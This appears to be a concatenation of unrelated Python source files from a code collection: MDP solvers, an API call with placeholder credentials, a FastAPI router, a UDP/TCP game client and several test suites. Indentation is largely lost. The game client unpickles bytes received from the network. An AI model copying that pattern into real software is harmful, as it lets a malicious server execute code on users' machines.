pi : numpy array of shape (N, 1)
Optimal policy of the environment.
"""
# initialize the value function and policy
pi = np.ones((model.num_states, 1))
val_ = np.zeros((model.num_states, 1))
for i in range(maxiter):
# Stopping criteria
stable_policy = True
# Policy evaluation
val_ = policy_evaluation(model, val_, pi)
for state in range(model.num_states):
# do policy improvement
action = np.argmax( np.sum( (model.R[state] + model.gamma * val_) * model.P[state,:,:], 0) )
# check if policy has been updated
if action != pi[state]:
# store new action
pi[state] = action
# update stopping criteria
stable_policy = False
# check if stopping criteria satisfied
if stable_policy:
print("Policy iteration converged after %d iterations." % i)
break
return val_, pi
def policy_evaluation(model, val_, policy):
"""
Evaluates a given policy.
Parameters
----------
model : python object
Holds information about the environment to solve
such as the reward structure and the transition dynamics.
val_ : numpy array of shape (N, 1)
Value function of the environment where N is the number
of states in the environment.
policy : numpy array of shape (N, 1)
Optimal policy of the environment.
Return
------
val_ : numpy array of shape (N, 1)
Value function of the environment where N is the number
of states in the environment.
"""
loop = True
while loop:
# initialize delta
delta = 0
for state in range(model.num_states):
# store old value
tmp = val_[state].copy()
# compute the value function
val_[state] = np.sum( (model.R[state] + model.gamma * val_) * model.P[state,:,int(policy[state])].reshape(-1,1))
# find maximum change in value
            delta = max(delta, np.abs(tmp - val_[state]).item())
# stopping criteria
if delta <= EPS * (1 - model.gamma) / model.gamma:
loop = False
return val_
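# Hedged usage sketch. The solvers above only assume a `model` exposing
# `num_states`, `gamma`, per-state rewards `R`, and a transition tensor `P`
# of shape (num_states, num_states, num_actions); the toy 2-state MDP below
# follows those conventions with illustrative numbers.
if __name__ == "__main__":
    from types import SimpleNamespace

    P = np.zeros((2, 2, 2))
    P[0, :, 0] = [1.0, 0.0]  # action 0 in state 0: stay in state 0
    P[0, :, 1] = [0.0, 1.0]  # action 1 in state 0: move to state 1
    P[1, :, 0] = [0.0, 1.0]  # state 1 is absorbing under both actions
    P[1, :, 1] = [0.0, 1.0]
    model = SimpleNamespace(num_states=2, gamma=0.9,
                            R=np.array([[0.0], [1.0]]), P=P)
    val_vi, pi_vi = value_iteration(model, maxiter=100)
    val_pi, pi_pi = policy_iteration(model, maxiter=100)
    print(val_vi.ravel(), pi_vi.ravel())  # both solvers should steer to state 1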
|
116133
|
import base64
import requests
def personal_access_token():
base_url = 'https://api.sipgate.com/v2'
token_id = 'YOUR_SIPGATE_TOKEN_ID'
token = '<PASSWORD>'
credentials = (token_id + ':' + token).encode('utf-8')
base64_encoded_credentials = base64.b64encode(credentials).decode('utf-8')
headers = {
'Authorization': 'Basic ' + base64_encoded_credentials
}
response = requests.get(base_url + '/account', headers=headers)
print('Status:', response.status_code)
print('Body:', response.content.decode("utf-8"))
if __name__ == "__main__":
personal_access_token()
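# Hedged illustration of the header built above: for token id "token-ABC"
# and token "secret", the credentials "token-ABC:secret" base64-encode to
# "dG9rZW4tQUJDOnNlY3JldA==", so the request carries the header
#   Authorization: Basic dG9rZW4tQUJDOnNlY3JldA==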
|
116159
|
import json
import pathlib
from pprint import pprint
# Load the list of package root paths.
with open(file='configs/packages.jsonc', mode='r') as pack_json:
file_paths = json.load(fp=pack_json)
all_directories = []
all_folders = []
for file_path in file_paths:
folder_path = pathlib.WindowsPath(file_path)
all_directories = all_directories + list(folder_path.iterdir())
for directory in all_directories:
folder_path = pathlib.WindowsPath(directory)
if folder_path.is_dir():
for folder in list(folder_path.iterdir()):
filter_list = [
'resources and note', 'config', 'configs',
'docs', 'data', 'indicators', 'sample-responses',
'dist', 'build', '.vscode', 'LICENSE', '.gitignore',
'.pypirc', '.git', '.github', 'tests', 'README.md',
'resources', 'samples', 'setup.py'
]
if folder.parts[-1] not in filter_list and not folder.is_file() and '.egg-info' not in folder.parts[-1]:
print(folder.parts)
all_folders.append(folder)
class WindowsPathEncoder(json.JSONEncoder):
def default(self, obj):
# If we have a Windows Path Object, convert it to a string.
if isinstance(obj, pathlib.WindowsPath):
return obj.as_posix()
# Let the base class default method raise the TypeError
return json.JSONEncoder.default(self, obj)
all_folders = list(set(all_folders))
# Save it to a JSON file.
with open(file='configs/packages_files.jsonc', mode='w+') as pack_json:
json.dump(
obj=all_folders,
fp=pack_json,
indent=2,
cls=WindowsPathEncoder
)
|
116166
|
import socket
from pickle import loads, dumps
class Pipe:
def __init__(self, server: str, port: int) -> None:
self.server = server
self.port = port
self.tcp = socket.socket()
self.udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.connected = False
self.username = None
self.udp_password = None
self.game_port = None
def connect(self) -> bool:
try:
self.tcp.connect((self.server, self.port))
self.connected = True
return True
except (ConnectionResetError, ConnectionRefusedError):
return False
def login(self) -> bool:
if not self.connected:
success = self.connect()
if not success:
return False
self.tcp.send(f"play request,,1234509876".encode())
response = self.tcp.recv(100)
if response == b"Pended":
return True
else:
return False
def await_response(self) -> list:
try:
data = self.tcp.recv(1000)
data = data.decode().split("||")
full_data = []
for seg in data:
seg = seg.split(",,")
full_data += seg
if seg[0] == "Start":
self.username = seg[1]
self.game_port = int(seg[2])
return full_data
except ConnectionResetError:
return [False]
def transport(self, game_data: list) -> tuple:
game_data = [self.username] + game_data
game_data = (dumps(game_data)) + b"||||"
self.udp.sendto(game_data, (self.server, self.game_port))
data, _ = self.udp.recvfrom(100)
data = data.split(b"||||")
if len(data) > 1:
data = loads(data[0])
return True, data
else:
return False, None
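# Hedged usage sketch; the host, port, and game payload are illustrative
# placeholders, not values from the original project.
if __name__ == "__main__":
    pipe = Pipe("127.0.0.1", 5000)
    if pipe.login():  # TCP handshake: sends "play request,,1234509876"
        events = pipe.await_response()  # blocks until e.g. ["Start", name, port]
        if events and events[0] == "Start":
            ok, state = pipe.transport(["move", 1, 2])  # one UDP game frame
            print(ok, state)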
|
116180
|
from setuptools import setup
"""
pip install twine
pip install build
CREATING RELEASES-------------------------------------------------------------------------------------------------------
- Update README.md version number
- Update setup.cfg version number
- Update goopylib/__init__.py __version__ variable
- Run setup_extensions.py and build goopylib .pyd C extensions
- Test all Example python files, run goopylib_tests.py and test functions on Windows
- Run goopylib_tests.py countlines() function and update README.md with line count
- Push to GitHub, pull from MacOS computer
- Run setup_extensions.py and build goopylib .so C extensions
- Test all Example python files, run goopylib_tests.py and test functions on MacOS
- Push files to GitHub
- Create GitHub Release
- Update download_url in setup.cfg
- Build goopylib Release
- Upload goopylib Release on TestPyPi
- Install and check from TestPyPi
- Upload goopylib Release on PyPi
- Test goopylib installation on Windows
- Test goopylib installation on MacOS
To create source distribution:
1. python -m build --sdist
2. python setup.py sdist
To create (platform) wheel:
1. python -m build --wheel
2. python setup.py bdist_wheel
To create release (wheel and source distribution):
1. python -m build
2. python setup.py sdist bdist_wheel
To check release: twine check dist/*
To upload test release: twine upload --repository testpypi dist/*
To install test release: pip install -i https://test.pypi.org/simple/ goopylib==version
To upload release: twine upload dist/*
To install release: pip install goopylib==version
Username: BhavyeMathur
"""
setup(package_dir={':maths': 'goopylib/maths', ":objects": 'goopylib/objects', ":applications": 'goopylib/applications',
":sound": 'goopylib/sound', ":physics": 'goopylib/physics'})
|
116182
|
import unittest
import json
from rpc_proxy.request import parse_request, translate_to_app_base
class ProxyTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = 1000
def test_parse_request_01(self):
# should read api and method from "method"
js = '{"jsonrpc":"2.0", "method":"bridge.get_ranked_posts", "params":{"sort":"trending","tag":"","observer":"alice"}, "id":1}'
js_data = json.loads(js)
expected = "rpc_ver: 2.0, api: bridge, method: get_ranked_posts, params: {'sort': 'trending', 'tag': '', 'observer': 'alice'}, id:1"
self.assertEqual(str(parse_request(js_data)), expected)
def test_parse_request_02(self):
# should read api and method from "params"
js = '{"jsonrpc":"2.0", "method":"call", "params": ["condenser_api", "get_follow_count", ["alice"]], "id":1}'
js_data = json.loads(js)
expected = "rpc_ver: 2.0, api: condenser_api, method: get_follow_count, params: ['alice'], id:1"
self.assertEqual(str(parse_request(js_data)), expected)
def test_parse_request_03(self):
# should create empty "params" field if not provided
js = '{"jsonrpc":"2.0", "method":"database_api.get_dynamic_global_properties", "id":1}'
js_data = json.loads(js)
expected = "rpc_ver: 2.0, api: database_api, method: get_dynamic_global_properties, params: [], id:1"
self.assertEqual(str(parse_request(js_data)), expected)
def test_translate_app_base(self):
"""
## With empty dict params
"""
js = '{"id": 85, "jsonrpc": "2.0", "method": "database_api.get_version", "params": {}}'
js_data = json.loads(js)
req = parse_request(js_data)
expected = "{'id': 85, 'jsonrpc': '2.0', 'method': 'call', 'params': ['condenser_api', 'get_version', []]}"
self.assertEqual(str(translate_to_app_base(req).data), expected)
"""
## No params provided
"""
js = '{"id": 85, "jsonrpc": "2.0", "method": "database_api.get_version"}'
js_data = json.loads(js)
req = parse_request(js_data)
expected = "{'id': 85, 'jsonrpc': '2.0', 'method': 'call', 'params': ['condenser_api', 'get_version', []]}"
self.assertEqual(str(translate_to_app_base(req).data), expected)
"""
## Params provided with list
"""
js = '{"id": 85, "jsonrpc": "2.0", "method": "condenser_api.get_following", "params":["hiveio",null,"blog",10]}'
js_data = json.loads(js)
req = parse_request(js_data)
expected = "{'id': 85, 'jsonrpc': '2.0', 'method': 'call', 'params': ['condenser_api', 'get_following', ['hiveio', None, 'blog', 10]]}"
self.assertEqual(str(translate_to_app_base(req).data), expected)
"""
## Params provided with dict
"""
js = '{"id": 85, "jsonrpc": "2.0", "method": "condenser_api.get_following", "params": {"foo":"bar"}}'
js_data = json.loads(js)
req = parse_request(js_data)
expected = "{'id': 85, 'jsonrpc': '2.0', 'method': 'call', 'params': ['condenser_api', 'get_following', ['bar']]}"
self.assertEqual(str(translate_to_app_base(req).data), expected)
|
116229
|
from typing import List
import asyncpg
from fastapi import APIRouter, HTTPException, Response
import utils
from api.dependencies import has_permissions
from api.models import ChallengeLanguage
from api.models.permissions import ManageWeeklyChallengeLanguages
from .helpers import check_piston_language_version
from .models import (
ChallengeLanguageResponse,
NewChallengeLanguageBody,
UpdateChallengeLanguageBody,
)
router = APIRouter(prefix="/languages")
@router.get(
"",
tags=["challenge languages"],
response_model=List[ChallengeLanguageResponse],
)
async def fetch_all_languages():
"""Fetch all the weekly challenge languages, ordered alphabetically."""
query = """
SELECT *,
l.id::TEXT
FROM challengelanguages l
ORDER BY name
"""
records = await ChallengeLanguage.pool.fetch(query)
return [dict(record) for record in records]
@router.get(
"/{id}",
tags=["challenge languages"],
response_model=ChallengeLanguageResponse,
responses={
404: {"description": "Language not found"},
},
)
async def fetch_language(id: int):
"""Fetch a weekly challenge language by its id."""
query = """
SELECT *,
l.id::TEXT
FROM challengelanguages l
WHERE l.id = $1
"""
record = await ChallengeLanguage.pool.fetchrow(query, id)
if not record:
raise HTTPException(404, "Language not found")
return dict(record)
@router.post(
"",
tags=["challenge languages"],
response_model=ChallengeLanguageResponse,
responses={
201: {"description": "Language Created Successfully"},
401: {"description": "Unauthorized"},
403: {"description": "Missing Permissions"},
404: {"description": "Piston language or version not found"},
409: {"description": "Language with that name already exists"},
},
status_code=201,
response_class=utils.JSONResponse,
dependencies=[has_permissions([ManageWeeklyChallengeLanguages()])],
)
async def create_language(body: NewChallengeLanguageBody):
"""Create a weekly challenge language."""
await check_piston_language_version(body.piston_lang, body.piston_lang_ver)
query = """
INSERT INTO challengelanguages (id, name, download_url, disabled, piston_lang, piston_lang_ver)
VALUES (create_snowflake(), $1, $2, $3, $4, $5)
RETURNING *;
"""
try:
record = await ChallengeLanguage.pool.fetchrow(
query,
body.name,
body.download_url,
body.disabled,
body.piston_lang,
body.piston_lang_ver,
)
except asyncpg.exceptions.UniqueViolationError:
raise HTTPException(409, "Language with that name already exists")
return dict(record)
@router.patch(
"/{id}",
tags=["challenge languages"],
responses={
204: {"description": "Language Updated Successfully"},
401: {"description": "Unauthorized"},
403: {"description": "Missing Permissions"},
404: {"description": "Piston language or version not found"},
409: {"description": "Language with that name already exists"},
},
status_code=204,
dependencies=[has_permissions([ManageWeeklyChallengeLanguages()])],
)
async def update_language(id: int, body: UpdateChallengeLanguageBody):
"""Update a weekly challenge language."""
query = "SELECT * FROM challengelanguages WHERE id = $1"
record = await ChallengeLanguage.pool.fetchrow(query, id)
if not record:
raise HTTPException(404, "Language not found")
language = ChallengeLanguage(**record)
data = body.dict(exclude_unset=True)
if "piston_lang" in data or "piston_lang_ver" in data:
await check_piston_language_version(
data.get("piston_lang", language.piston_lang),
data.get("piston_lang_ver", language.piston_lang_ver),
)
if data:
query = "UPDATE challengelanguages SET "
query += ", ".join(f"{key} = ${i}" for i, key in enumerate(data, 2))
query += " WHERE id = $1"
try:
await ChallengeLanguage.pool.execute(query, id, *data.values())
except asyncpg.exceptions.UniqueViolationError:
raise HTTPException(409, "Language with that name already exists")
return Response(status_code=204, content="")
@router.delete(
"/{id}",
tags=["challenge languages"],
responses={
204: {"description": "Language Deleted Successfully"},
401: {"description": "Unauthorized"},
403: {"description": "Missing Permissions or language used in a challenge"},
404: {"description": "Language not found"},
},
status_code=204,
dependencies=[has_permissions([ManageWeeklyChallengeLanguages()])],
)
async def delete_language(id: int):
"""Delete a weekly challenge language, if it hasn't been used in any challenges."""
query = "SELECT * FROM challengelanguages WHERE id = $1"
record = await ChallengeLanguage.pool.fetchrow(query, id)
if not record:
raise HTTPException(404, "Language not found")
# language = ChallengeLanguage(**record)
query = """
SELECT * FROM challenges WHERE $1 = ANY(language_ids)
"""
records = await ChallengeLanguage.pool.fetch(query, id)
if records:
raise HTTPException(403, "Language used in a challenge")
await ChallengeLanguage.pool.execute(
"DELETE FROM challengelanguages WHERE id = $1", id
)
return Response(status_code=204, content="")
|
116245
|
import os, sys, time, random
from core.Profiler import *
from colorama import Fore
from core import settings
from datetime import date
from txt.text import text
from txt.header import lb_header
from tkinter import *
def checkVersion():
    # `warning` is expected to come from the star imports above
    if sys.version_info[0] != 3:
        sys.exit(warning + " Please run python version 3.")
def clear():
if os.name == 'nt':
return os.system('cls')
else:
return os.system('clear')
def times():
    return time.strftime("%H:%M:%S")
def menu(self,screen):
global labl
pr = Profiler()
pr.loadDatabase(settings.pathDatabase)
sizeOfDB = pr.size
nbProfilesBDD = pr.count
# print(lb_header())
# print(menu% (Fore.YELLOW + str(date.today()) + Fore.RESET, # for date
# Fore.YELLOW + times() + Fore.RESET, # for time
# Fore.YELLOW + str(settings.timezone) + Fore.RESET, # timezone
# Fore.YELLOW + str(settings.version) + Fore.RESET, # version
# Fore.CYAN + settings.country + Fore.RESET, # Country
# settings.countrycode, # countrycode
# Fore.CYAN + str(settings.Region) + Fore.RESET, Fore.YELLOW + str(settings.Regionname) + Fore.RESET, # Region
# Fore.YELLOW + str(settings.zip) + Fore.RESET, # Pincode
# settings.isp, Fore.GREEN + settings.org + Fore.RESET,
# Fore.YELLOW + str(settings.query) + Fore.RESET,
# Fore.GREEN + str(nbProfilesBDD) + Fore.RESET, Fore.RED + str(sizeOfDB) + Fore.RESET, #database
# random.choice(text)# txt
# ))
    if screen:
menu = """
Time: [ {0} | {1} ]\n
Time Zone: [ {2} ]\n
Author: [ ANKESH054 ]\n
Version: [ {3} ]\n
Country: [ {4} | {5} ]\n
Region: [ {6} | {7} ]\n
Pin Code: [ {8} ]\n
ISP: [ {9} ]\n
Gateways: [ {10} ]\n
Public Ip: [ {11} ]\n
Database: [ {12} | {13} Ko ]\n
{14}
"""
else:
menu = """
Time: [ {0} | {1} ]\n
Time Zone: [ {2} ]\n
Country: [ {4} | {5} ]\n
Region: [ {6} | {7} ]\n
Pin Code: [ {8} ]\n
ISP: [ {9} ]\n
Gateways: [ {10} ]\n
Public Ip: [ {11} ]\n
Database: [ {12} | {13} Ko ]\n\n
{14}
"""
labl = Label(self, text=menu.format(str(date.today()), # for date
times(), # for time
str(settings.timezone), # timezone
str(settings.version), # version
settings.country, # Country
settings.countrycode, # countrycode
str(settings.Region), str(settings.Regionname), # Region
str(settings.zip), # Pincode
settings.isp, settings.org,
str(settings.query),
str(nbProfilesBDD), str(sizeOfDB), # database
random.choice(text) # txt
), bg="black", fg="green",
font=("comicsansms", 15, "bold"), relief=FLAT)
labl.place(x=20, y=2)
# return
|
116247
|
from spylunking.log.setup_logging import test_logger
from antinex_utils.consts import SUCCESS
from antinex_utils.consts import ERR
from antinex_utils.consts import FAILED
from tests.mock_model import MockModel
log = test_logger(name='mock-predictions')
def build_response_data(
req):
"""build_response_data
:param req: request dict
"""
model = MockModel(
req=req)
predictions = req.get(
"test_predictions",
[])
sample_predictions = req.get(
"test_predictions",
[])
rounded = req.get(
"test_predictions",
[])
accuracy = req.get(
"test_accuracy",
{
"accuracy": 52.5
})
error = req.get(
"test_error",
None)
image_file = req.get(
"image_file",
None)
history = req.get(
"history",
None)
histories = req.get(
"histories",
None)
indexes = req.get(
"test_indexes",
None)
scores = req.get(
"test_scores",
None)
cm = req.get(
"test_cm",
None)
predicts_merged = req.get(
"test_predicts_merged",
False)
merge_df = req.get(
"test_merge_df",
None)
data = {
"predictions": predictions,
"rounded_predictions": rounded,
"sample_predictions": sample_predictions,
"acc": accuracy,
"scores": scores,
"history": history,
"histories": histories,
"image_file": image_file,
"model": model,
"indexes": indexes,
"confusion_matrix": cm,
"are_predicts_merged": predicts_merged,
"merge_df": merge_df,
"err": error
}
return data
# end of build_response_data
def mock_make_predictions_success(
req):
"""mock_make_predictions_success
:param req: request dict
"""
res = {
"status": SUCCESS,
"err": "mock success test",
"data": build_response_data(req)
}
log.info("returning SUCCESS")
return res
# end of mock_make_predictions_success
def mock_make_predictions_error(
req):
"""mock_make_predictions_error
:param req: request dict
"""
res = {
"status": ERR,
"err": "mock error test",
"data": build_response_data(req)
}
log.info("returning ERROR")
return res
# end of mock_make_predictions_error
def mock_make_predictions_fail(
req):
"""mock_make_predictions_fail
:param req: request dict
"""
res = {
"status": FAILED,
"err": "mock fail test",
"data": build_response_data(req)
}
log.info("returning FAILED")
return res
# end of mock_make_predictions_fail
|
116251
|
import numpy as np
import pytest
from shapecheck import (ShapeError, check_shapes, is_checking_enabled, is_compatible,
set_checking_enabled, str_to_shape)
from .utils import CaptureStdOut
def test_basic():
@check_shapes('3', '4', out_='2')
def f(x, y):
return x[:2]**2 + y[:2]**2
f(np.array([1, 2, 3]), np.array([1, 2, 3, 4]))
with pytest.raises(ShapeError):
f(np.array([1, 2, 3]), np.array([2, 3, 4]))
def test_named_dim():
@check_shapes('3,N', 'N', out_='1,N')
def f(x, y):
return (x + y).sum(0, keepdims=True)
f(np.ones((3, 5)), np.ones((5,)))
with pytest.raises(ShapeError):
f(np.ones((3, 4)), np.ones((5,)))
def test_named_dim_one_arg():
@check_shapes('A,A,N', out_='N')
def f(x):
return x.sum((0, 1))
f(np.ones((5, 5, 7)))
with pytest.raises(ShapeError):
f(np.ones((6, 5, 7)))
def test_any_dim():
@check_shapes('N,-1', out_='N,1')
def f(x):
return x.sum(-1, keepdims=True)
f(np.ones((5, 3)))
f(np.ones((5, 7)))
def test_ndim_mismatch():
@check_shapes('-1,-1')
def f(x):
return x
f(np.ones((1, 2)))
with pytest.raises(ShapeError):
f(np.ones((1,)))
with pytest.raises(ShapeError):
f(np.ones((1, 2, 3)))
def test_no_stdout():
    # The decorator should not print anything to stdout.
with CaptureStdOut() as output:
@check_shapes('3,A,A,N', out_='N')
def f(x):
return x.sum((0, 2, 1))
f(np.ones((3, 5, 5, 7)))
with pytest.raises(ShapeError):
f(np.ones((3, 6, 5, 7)))
assert len(output) == 0
def test_readme_example():
import numpy as np
from shapecheck import check_shapes
@check_shapes('-1,N', 'N', None, '3,N', out_='3,N')
def f(a, b, c, d):
return (a + b).sum(0, keepdims=True) + d
f(np.ones((7, 5)), np.ones(5), 'anything', np.ones((3, 5))) # succeeds
f(np.ones((2, 6)), np.ones(6), np.ones(1), np.ones((3, 6))) # succeeds
with pytest.raises(ShapeError):
f(np.ones((2, 6)), np.ones(5), np.ones(1), np.ones((3, 6))) # fails
@check_shapes('1,...,1', '...,1,1')
def g(a, b):
pass
g(np.ones((1, 3, 4, 1)), np.ones((2, 1, 1))) # succeeds
g(np.ones((1, 1)), np.ones((1, 1))) # succeeds
with pytest.raises(ShapeError):
g(np.ones((2, 3, 4, 1)), np.ones((1, 1))) # fails
@check_shapes('batch,variadic...', 'variadic...')
def h(a, b):
pass
h(np.ones((7, 1, 2)), np.ones((1, 2))) # succeeds
with pytest.raises(ShapeError):
h(np.ones((6, 2)), np.ones((1, 1))) # fails
with pytest.raises(ShapeError):
h(np.ones((6, 2)), np.ones((1))) # fails
def test_non_array_args():
@check_shapes(None, '2,N', None)
def f(x, y, z):
return 1
f('some string', np.ones((2, 5)), np.ones((5,)))
f(np.ones((1, 2, 3)), np.ones((2, 6)), 'non-array object')
with pytest.raises(ShapeError):
f(np.ones((1, 1)), np.ones((3, 5)), np.ones((5,)))
with pytest.raises(ShapeError):
f('another-test', np.ones((3, 6)), 'non-array object')
@pytest.mark.parametrize('string, shape', [('N,1,3,M', ('N', 1, 3, 'M')),
('N, 1, 3, M', ('N', 1, 3, 'M')),
('...,a,1', ('...', 'a', 1)),
('1, ... ,2', (1, '...', 2)),
('a,b,c,...', ('a', 'b', 'c', '...')),
('...', ('...',))])
def test_str_to_shape(string, shape):
result = str_to_shape(string)
for a, b in zip(shape, result):
assert a == b, f'Expected: {shape} Got: {result}'
@pytest.mark.parametrize('string', [
'...,...,...', 'a,...,b,...', '...,1,...', (1, 2), 3, 4.0, [5.0], ['1,2'], ('1,2',)
])
def test_str_to_shape_error(string):
with pytest.raises(RuntimeError):
str_to_shape(string)
@pytest.mark.parametrize('shape, expected_shape', [
((3, 2, 3), ('n', 2, 'n')),
((3, 2, 3), ('n', '...', 2, 'n')),
((3, 1, 1, 2, 3), ('n', '...', 2, 'n')),
((3, 2, 3), ('...', 'n', 2, 'n')),
((1, 1, 3, 2, 3), ('...', 'n', 2, 'n')),
((3, 2, 3), ('n', 2, 'n', '...')),
((3, 2, 3, 1, 1), ('n', 2, 'n', '...')),
((3, 2, 3), ('...',)),
])
def test_compatible_variadic_shapes(shape, expected_shape):
assert is_compatible(shape, expected_shape)
@pytest.mark.parametrize('shape, expected_shape', [
((3, 3, 3), ('n', 2, 'n')),
((3, 2, 4), ('n', '...', 2, 'n')),
((3, 1, 1, 3, 3), ('n', '...', 2, 'n')),
((4, 2, 3), ('...', 'n', 2, 'n')),
((1, 1, 2, 3), ('...', 'n', 2, 'n')),
((3, 3), ('n', 2, 'n', '...')),
((2, 3, 1, 1), ('n', 2, 'n', '...')),
])
def test_incompatible_variadic_shapes(shape, expected_shape):
assert not is_compatible(shape, expected_shape)
@pytest.mark.parametrize('e_shape1, e_shape2, shape1, shape2', [
(('n...,1,1', 'n...', (1, 2, 3, 1, 1), (1, 2, 3))),
(('...,1,1', 'n...', (1, 2, 3, 1, 1), (1, 2, 3))),
(('n...,2,2', '1,n...', (2, 2), (1,))),
(('n...,1,1', 'a...', (1, 2, 3, 1, 1), (1, 3))),
(('1,2,a...,3,4', '6,a...,7', (1, 2, 9, 9, 3, 4), (6, 9, 9, 7))),
(('1,2,a...,3,4', '6,a...,7', (1, 2, 9, 3, 4), (6, 9, 7))),
(('1,2,a...,3,4', '6,a...,7', (1, 2, 3, 4), (6, 7))),
])
def test_named_variadic_shapes(e_shape1, e_shape2, shape1, shape2):
@check_shapes(e_shape1, e_shape2)
def f(a, b):
pass
f(np.ones(shape1), np.ones(shape2))
@pytest.mark.parametrize('e_shape1, e_shape2, shape1, shape2', [
(('n...,1,1', 'n...', (1, 2, 3, 1, 1), (1, 3, 3))),
(('n...,1,1', 'n...', (1, 2, 3, 1, 1), (1, 3))),
(('n...,2,2', '1,n...', (2, 2), (1, 1))),
(('n...,2,2', 'n...', (2, 2), (1,))),
(('n...,', 'n...', (2, 2), (1,))),
(('1,2,a...,3,4', '6,a...,7', (1, 2, 8, 9, 3, 4), (6, 9, 9, 7))),
(('1,2,a...,3,4', '6,a...,7', (1, 2, 7, 3, 4), (6, 9, 7))),
(('1,2,a...,3,4', '6,a...,7', (1, 2, 3, 4), (6, 1, 7))),
])
def test_bad_named_variadic_shapes(e_shape1, e_shape2, shape1, shape2):
@check_shapes(e_shape1, e_shape2)
def f(a, b):
pass
with pytest.raises(ShapeError):
f(np.ones(shape1), np.ones(shape2))
def test_incompatible_output():
@check_shapes(out_='1,1')
def f():
return np.ones((1,))
with pytest.raises(ShapeError):
f()
def test_nested_structs():
@check_shapes(('N,1', 'N'), '1,2', out_={'one': ('N,1', 'N'), 'two': ('1,2')})
def f(one, two):
return {'one': one, 'two': two}
f((np.ones((7, 1)), np.ones((7,))), np.ones((1, 2)))
with pytest.raises(ShapeError):
f((np.ones((7, 1)), np.ones((6,))), np.ones((1, 2)))
def test_readme_nested_example():
@check_shapes(('N,1', 'N'), '1,2', out_={'one': ('N,1', 'N'), 'two': ('1,2')})
def f(one, two):
return {'one': (one[1], one[1]), 'two': two.sum()}
with pytest.raises(ShapeError):
f((np.ones((7, 1)), np.ones((7,))), np.ones((1, 2)))
def test_readme_set_checking_enabled():
from shapecheck import is_checking_enabled, set_checking_enabled
assert is_checking_enabled()
set_checking_enabled(False)
assert not is_checking_enabled()
set_checking_enabled(True)
assert is_checking_enabled()
with set_checking_enabled(False):
assert not is_checking_enabled()
assert is_checking_enabled()
def test_set_checking_enabled():
@check_shapes('3', '4', out_='2')
def f(x, y):
return x[:2]**2 + y[:2]**2
set_checking_enabled(False)
assert not is_checking_enabled()
f(np.array([1, 2, 3]), np.array([1, 2, 3, 4]))
f(np.array([1, 2, 3]), np.array([2, 3, 4]))
@check_shapes('3', '4', out_='2')
def g(x, y):
return x[:2]**2 + y[:2]**2
set_checking_enabled(True)
assert is_checking_enabled()
with pytest.raises(ShapeError):
f(np.array([1, 2, 3]), np.array([2, 3, 4]))
with pytest.raises(ShapeError):
g(np.array([1, 2, 3]), np.array([2, 3, 4]))
def test_set_checking_enabled_context():
@check_shapes('3', '4', out_='2')
def f(x, y):
return x[:2]**2 + y[:2]**2
assert is_checking_enabled()
with set_checking_enabled(False):
assert not is_checking_enabled()
f(np.array([1, 2, 3]), np.array([1, 2, 3, 4]))
f(np.array([1, 2, 3]), np.array([2, 3, 4]))
@check_shapes('3', '4', out_='2')
def g(x, y):
return x[:2]**2 + y[:2]**2
assert is_checking_enabled()
with pytest.raises(ShapeError):
f(np.array([1, 2, 3]), np.array([2, 3, 4]))
with pytest.raises(ShapeError):
g(np.array([1, 2, 3]), np.array([2, 3, 4]))
def test_match_callees():
@check_shapes('N', 'M', 'O', out_='N')
def f(x, y, z):
return x
@check_shapes('N', 'M', 'R', match_callees_=True)
def g(x, y, z):
return f(x, y, z)
g(np.ones(5), np.ones(6), np.ones(7))
def test_match_callees_error():
@check_shapes('N', 'M', 'O', out_='N')
def f(x, y, z):
return x
@check_shapes('M', 'N', 'R', match_callees_=True)
def g(x, y, z):
return f(x, y, z)
with pytest.raises(ShapeError):
g(np.ones(5), np.ones(6), np.ones(7))
def test_match_callees_complex():
@check_shapes('a, v...', 'v...', out_='v...')
def f(x, y):
return x.sum(0) + y
@check_shapes('v...')
def g(x):
return x.sum()
@check_shapes('a', match_callees_=True)
def h(x):
a = np.ones((x.shape[0], 2, 3, 4))
b = np.ones((2, 3, 4))
f(a, b)
return g(np.ones((5, 4, 3)))
h(np.ones((8)))
@check_shapes('a', match_callees_=True)
def h(x):
a = np.ones((x.shape[0] - 1, 2, 3, 4))
b = np.ones((2, 3, 4))
f(a, b)
return g(np.ones((5, 4, 3)))
with pytest.raises(ShapeError):
h(np.ones((8)))
def test_match_callees_readme():
@check_shapes('M', 'N', 'O', out_='M')
def child_fn(a, b, c):
return a
@check_shapes('M', 'N', 'R')
def parent_fn_1(x, y, z):
return child_fn(y, x, z)
@check_shapes('M', 'N', 'R', match_callees_=True)
def parent_fn_2(x, y, z):
return child_fn(y, x, z)
parent_fn_1(np.ones(5), np.ones(6), np.ones(7)) # succeeds
with pytest.raises(ShapeError):
parent_fn_2(np.ones(5), np.ones(6), np.ones(7)) # fails
@pytest.mark.parametrize('cs_args, cs_kwargs, f_args, f_kwargs', [
(('N', 'M', 'O', 'P'), {}, (1, 2, 3), {}),
(('N', 'M', 'O', 'P'), {}, (1, 2), {'c': 3}),
(('N', 'M', 'O',), {}, (1, 2, 3), {}),
(('N', 'M'), {}, (1, 2), {'c': 3}),
(('N', 'M', 'O', 'P'), {}, (1,), {'c': 3, 'b': 2}),
(('N', 'M', 'O'), {'d': 'P'}, (1, 2, 3), {}),
(('N', 'M'), {'c': 'O', 'd': 'P'}, (1, 2, 3), {}),
(('N',), {'b': 'M', 'c': 'O', 'd': 'P'}, (1, 2), {'c': 3}),
((), {'a': 'N', 'b': 'M', 'c': 'O', 'd': 'P'}, (1, 2, 3), {}),
((), {'a': 'N', 'b': 'M', 'c': 'O', 'd': 'P'}, (1, 2), {'c': 3}),
]) # yapf: disable
def test_check_shapes_signature(cs_args, cs_kwargs, f_args, f_kwargs):
# TODO: write more rigorous shape signature tests
@check_shapes(*cs_args, **cs_kwargs)
def f(a, b, c, *, d):
pass
f_kwargs = {k: np.ones(v) for k, v in f_kwargs.items()}
f(*map(np.ones, f_args), d=np.ones(4), **f_kwargs)
def test_readme_example2():
# yapf: disable
@check_shapes({'imgs': 'N,W,W,-1', 'labels': 'N,1'}, 'N', None, out_='')
def loss_fn(batch, arg2, arg3):
diff = (batch['imgs'].mean((1, 2, 3)) - batch['labels'].squeeze())
return np.mean(diff**2 + arg2)
loss_fn({'imgs': np.ones((3, 2, 2, 1)), 'labels': np.ones((3, 1))},
arg2=np.ones(3), arg3=np.ones((2, 3))) # succeeds
loss_fn({'imgs': np.ones((5, 3, 3, 4)), 'labels': np.ones((5, 1))},
arg2=np.ones(5), arg3='any') # succeeds
